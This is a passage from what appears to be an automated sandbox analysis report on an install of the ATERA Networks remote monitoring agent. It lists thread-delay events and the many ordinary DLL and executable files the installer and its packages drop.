                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Thread delayed: delay time: 592829
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe Thread delayed: delay time: 7200000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe Thread delayed: delay time: 7199859
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Thread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 3643
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 6065
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 6827
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Window / User API: threadDelayed 2698
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Window / User API: threadDelayed 5252
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe Window / User API: threadDelayed 1821
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2668
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7087
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Window / User API: threadDelayed 5699
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe Window / User API: threadDelayed 4098
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Window / User API: threadDelayed 2106
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Window / User API: threadDelayed 1080
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Window / User API: threadDelayed 8074
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe Window / User API: threadDelayed 1683
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe Window / User API: threadDelayed 7369
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe Window / User API: threadDelayed 2294
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe Window / User API: threadDelayed 1779
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackages.CommonLib.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\CredentialManagement.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.CommonLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Dynamic.Runtime.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackages.Exceptions.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.X509Certificates.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\StructureMap.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI2D79.tmp
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.FileProviders.Physical.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\AgentPackageRuntimeInstaller.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Interop.WUApiLib.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.UserSecrets.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\NLog.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Dropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Data.SQLite.dll
                                Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\log4net.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Contracts.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4d.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.ThreadPool.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICBAB.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Pipes.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.FileExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.Client.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ObjectModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTrayTMP.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Process.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileSystemGlobbing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingNotifications.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Abstractions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Debug.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9409.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Atera.AgentCommunication.Models.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\TicketingTray.exe (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Options.ConfigurationExtensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Http.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Globalization.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.Queryable.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI41D1.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Security.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\MQTTnet.Extensions.ManagedClient.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.AppContext.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x64\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\AgentPackageOsUpdates.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.Core.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI432A.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\it\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exeJump to dropped file
